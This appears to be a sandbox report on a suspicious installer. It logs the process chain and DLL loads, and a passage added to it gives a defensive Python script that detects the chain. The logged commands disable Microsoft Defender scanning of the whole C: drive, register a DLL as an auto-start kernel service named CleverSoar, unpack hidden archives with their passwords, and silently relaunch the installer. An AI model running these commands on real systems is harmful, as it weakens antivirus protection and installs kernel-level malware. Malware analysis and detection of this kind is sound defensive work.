Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Process created: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20432,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Process created: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20442,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Windows\System32\sc.exe sc start CleverSoar Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
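The process chain listed above is the part of this report a responder wants to extract mechanically: the Inno Setup `.tmp` stage launches PowerShell with `Add-MpPreference -ExclusionPath 'C:\'` (a whole-volume Defender exclusion), relaunches the installer with `/VERYSILENT`, registers `tProtect.dll` under `Program Files (x86)\Windows NT` as a `type= kernel` service named CleverSoar, unpacks `res.dat` and `locale3.dat` with `7zr.exe` using passwords passed on the command line, and then retries `sc start CleverSoar` dozens of times. The script below is an added example, not code from the Joe Sandbox report, the sample, or any vendor. It parses the report's own `Source: <parent> Process created: <child> <command line>` format, reconstructs each event, applies four rules for those behaviours, and recovers the 7-Zip passwords so the dropped archives can be unpacked for static analysis. `SAMPLE_LINES` is a constructed subset copied verbatim from the lines above; the rule names and severities are this example's own choices, not anything the report defines.

```python
"""Triage of 'Process created' report lines (added example, not code from the sandbox
report, the sample or any vendor). SAMPLE_LINES is a constructed subset copied from the
report above; rule names and severities are this example's own choices."""
import re
from collections import Counter

SAMPLE_LINES = r"""
Source: unknown Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe"
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
"""

LINE_RE = re.compile(r"^Source:\s+(?P<parent>.*?)\s+Process created:\s+(?P<rest>.*?)(?:\s+Jump to behavior)?$")
# The child image is the shortest prefix ending in .exe/.tmp followed by whitespace;
# Inno Setup stages live in an is-XXXX.tmp directory, so '.tmp\' must not terminate it.
CHILD_RE = re.compile(r"^(?P<child>.*?\.(?:exe|tmp))\s+(?P<cmd>.*)$", re.I)


def parse_line(line):
    """One report line -> {'parent', 'child', 'cmd'}; None for lines that are not events."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    parent, rest = m.group("parent"), m.group("rest")
    c = CHILD_RE.match(rest)
    if not c:  # e.g. 'unknown unknown' when the sandbox lost track of the child
        return {"parent": parent, "child": rest, "cmd": ""}
    return {"parent": parent, "child": c.group("child"), "cmd": c.group("cmd")}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def split_cmdline(cmd):
    """Whitespace split that keeps double-quoted runs (Windows paths with spaces) whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def check_event(ev):
    """Apply the four rules this chain triggers; return a list of finding dicts."""
    child, cmd, toks = basename(ev["child"]), ev["cmd"], split_cmdline(ev["cmd"])
    out = []
    if child == "powershell.exe" and re.search(r"add-mppreference", cmd, re.I):
        m = re.search(r"-ExclusionPath\s+'?([^'\s]+)'?", cmd, re.I)
        path = m.group(1) if m else "?"
        scope = "entire volume" if re.fullmatch(r"[A-Za-z]:\\?", path) else "path"
        out.append({"severity": "high", "rule": "defender_exclusion", "value": path,
                    "detail": f"Defender exclusion added for {path} ({scope})"})
    if child == "sc.exe" and len(toks) >= 3 and toks[1].lower() == "create":
        # sc.exe syntax is 'key= value', so each 'key=' token is followed by its value.
        opts = {toks[i][:-1].lower(): toks[i + 1]
                for i in range(len(toks) - 1) if toks[i].endswith("=")}
        binpath = opts.get("binpath", "")
        if opts.get("type", "").lower() == "kernel":
            # A normal driver is a .sys under System32\drivers; a .dll under Program Files is not.
            odd = (not binpath.lower().endswith(".sys")
                   or "\\system32\\drivers\\" not in binpath.lower())
            out.append({"severity": "high" if odd else "medium", "rule": "kernel_driver_service",
                        "value": binpath,
                        "detail": f"kernel service {toks[2]} -> {binpath}, start={opts.get('start', '?')}"})
    if child in ("7zr.exe", "7z.exe", "7za.exe"):
        pw = next((t[2:] for t in toks[1:] if t.startswith("-p")), None)  # 7-Zip: -p<password>
        archive = next((t for t in toks[2:] if not t.startswith("-")), "?")
        if pw is not None:
            out.append({"severity": "medium", "rule": "7zip_password_on_cmdline", "value": pw,
                        "detail": f"{archive} extracted with password {pw!r}; reuse it to unpack the payload"})
    if "/verysilent" in cmd.lower() and basename(ev["parent"]).endswith(".tmp"):
        out.append({"severity": "low", "rule": "inno_silent_relaunch", "value": child,
                    "detail": f"{basename(ev['parent'])} relaunched {child} with /VERYSILENT"})
    return out


def triage(text):
    """Parse every event line, run the rules, and count 'sc start <svc>' retries."""
    events = [ev for ev in map(parse_line, text.splitlines()) if ev]
    findings = [f for ev in events for f in check_event(ev)]
    starts = Counter()
    for ev in events:
        toks = split_cmdline(ev["cmd"])
        if basename(ev["child"]) == "sc.exe" and len(toks) >= 3 and toks[1].lower() == "start":
            starts[toks[2]] += 1
    return {"event_count": len(events), "findings": findings, "start_attempts": dict(starts)}


if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for f in result["findings"]:
        print(f"[{f['severity']}] {f['rule']}: {f['detail']}")
    print("sc start attempts:", result["start_attempts"])
```

Run as-is it reports five findings from the ten constructed lines: the `C:\` exclusion, the silent relaunch, the kernel service whose `binPath` is a `.dll` outside `System32\drivers` (rated high for that reason), and the two 7-Zip passwords `ad8dtyw9eyfd9aslyd9iald` and `asfasdf79yf9layslofs`, plus two `sc start CleverSoar` attempts (the full list above shows many more, which is itself worth noting: a service that needs that many start attempts is not starting cleanly). The same four rules map directly onto Sysmon Event ID 1 or Security 4688 command-line fields on a real host; the report format is parsed here only because it is what this page provides.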
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
